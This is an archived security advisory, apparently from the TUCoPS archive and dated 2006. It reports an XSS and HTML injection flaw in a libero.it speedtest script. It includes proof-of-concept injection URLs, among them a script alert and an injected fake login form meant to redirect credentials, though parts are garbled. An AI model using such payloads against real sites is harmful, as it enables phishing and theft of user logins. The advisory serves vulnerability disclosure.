TUCoPS :: Web :: Specific Sites :: b06-2014.htm

libero.it XSS vulnerability - HTML injection
libero.it XSS vulnerability - HTML injection
libero.it XSS vulnerability - HTML injection

--Security Report--
Advisory: libero.it XSS vulnerability - HTML injection
Author: Davide Denicolo
Date: 28/04/06 
Contact: davidesecurityinfos.com
Vendor: ItaliaOnLine S.r.l (http://www.libero.it) 
Service: Web
Level: Low

Libero.it is a Web portal of big Italian ISP: ItaliaOnLine offering
dial-up,Broadband and talk services.
A Broadband service  called "Libero speedtest" is a simple "Bandwidth Speed
A java applet test, send Bandwidth information to perl script
(print_result_spt.pl) in the GET request and
this perl script simply put parameter in the page as HTML;
an attacker can exploit the vulnerable script to have arbitrary script code
executed in the browser or injects html form so redirect a login
authentication to another web application;

this is a normal HTTP URL:
3&tdown=18875&tup=74297&size 48.0&t=0

this is a XSS URL:

ipt>alert('ciao')&tdown=3455&tup=5107&size 48.0&t=0

and this is an HTML form :


src="http://www.libero.it/i05/entra_hp.gif" alt="Entra" border="0" height="22" type="image" width="44">

and this is previous form injects in the request:
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up= le%20border="0"%20width="32%"> .1">@libero.it@inwind">ize:8pt">@libero.it@inwind. @iol.it@blu.it">it@iol.it@blu.it< /option>name="T3"%20style="font-size:7pt">


< /tr>&tdown=3455&tup=5107&size 48.0&t=0 -- Timeline: * 2/05/2006: Vulnerability found. * 2/05/2006: Unable to contact vendor -- For more information, please send question to: davidesecutityinfos.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986- AOH